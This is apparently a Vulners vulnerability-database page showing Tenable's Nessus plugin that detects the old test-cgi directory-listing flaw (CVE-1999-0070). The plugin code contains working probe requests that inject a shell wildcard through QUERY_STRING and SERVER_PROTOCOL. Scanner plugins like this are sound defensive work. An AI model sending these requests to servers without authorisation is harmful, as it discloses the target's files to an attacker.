Vulners
Lucene search
Multiple Vendor test-cgi Arbitrary File Access
| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
 | Test-Cgi Remote Command Execution (CVE-1999-0070) | 11 Sep 199900:00 | – | checkpoint_advisories |
 | CVE-1999-0070 | 29 Sep 199904:00 | – | cve |
 | CVE-1999-0070 | 29 Sep 199904:00 | – | cvelist |
 | CVE-1999-0070 | 1 Apr 199605:00 | – | nvd |
 | CVE-1999-0070 | 7 Jan 202609:43 | – | redhatcve |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/advisories/582 |
| cve | www.cve.mitre.org/cgi-bin/cvename.cgi |
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(10282);
script_version("1.39");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-1999-0070");
script_bugtraq_id(2003);
script_name(english:"Multiple Vendor test-cgi Arbitrary File Access");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI script that is affected by
information disclosure vulnerabilities.");
script_set_attribute(attribute:"description", value:
"The remote web server contains the 'test-cgi' test script, which is
included by default with some web servers.
The version of this script on the remote host fails to quote input to
several environment variables, such as 'QUERY_STRING', before echoing
it back as part of a shell script. An unauthenticated attacker can
leverage this issue to list the contents of directories on the remote
host, subject to the permissions of the web server user id.");
script_set_attribute(attribute:"see_also", value:"http://www.securityfocus.com/advisories/582");
script_set_attribute(attribute:"solution", value:
"Disable or delete the CGI script.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"1996/04/01");
script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 1999-2022 Tenable Network Security, Inc.");
script_dependencies("http_version.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
cgi = "test-cgi";
pat = string("[= ]", cgi, "($| )");
foreach dir (cgi_dirs())
{
url = string(dir, "/", cgi);
# Try an exploit using QUERY_STRING.
info = "";
exploit = strcat('GET ', url, '?* HTTP/1.0\r\n\r\n');
w = http_send_recv_buf(port: port, data: exploit);
if (isnull(w)) exit(1, "the web server did not answer");
res = strcat(w[0], w[1], '\r\n', w[2]);
lines = egrep(pattern:"^QUERY_STRING *= *", string:res);
if (lines)
{
foreach line (split(lines, keep:FALSE))
{
# There's a problem if we see the script name in the line; eg,
# QUERY_STRING = nph-test-cgi printenv test-cgi
if (ereg(string:line, pattern:pat))
{
info = line;
break;
}
}
}
# If the exploit didn't work but the script appears to exist...
if (lines && !info && thorough_tests)
{
# Try an exploit using SERVER_PROTOCOL.
exploit = strcat('GET ', url, '?x HTTP/1.0 *\r\n\r\n');
w = http_send_recv_buf(port: port, data: exploit);
if (isnull(w)) exit(1, "the web server did not answer");
res = strcat(w[0], w[1], '\r\n', w[2]);
lines = egrep(pattern:"^SERVER_PROTOCOL *= *", string:res);
if (lines)
{
foreach line (split(lines, keep:FALSE))
{
# There's a problem if we see the script name in the line; eg,
# SERVER_PROTOCOL = HTTP/1.0 nph-test-cgi printenv test-cgi
if (ereg(string:line, pattern:pat))
{
info = line;
break;
}
}
}
}
if (info)
{
if (report_verbosity)
{
info = strstr(info, "=") - "=";
while (info[0] == " ") info = substr(info, 1);
if ("HTTP/" >< info) info = ereg_replace(pattern:"^HTTP/[0-9]\.[0-9] +", replace:"", string:info);
info = str_replace(find:" ", replace:'\n ', string:info);
report = string(
"\n",
"Here are the contents of the CGI directory '", dir, "' on the\n",
"remote host :\n",
"\n",
" ", info, "\n",
"\n",
"which Nessus collected by sending the following request :\n",
"\n",
" ", exploit, "\n"
);
security_warning(port:port, extra:report);
}
else security_warning(port);
exit(0);
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Apr 2022 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 25
EPSS0.85207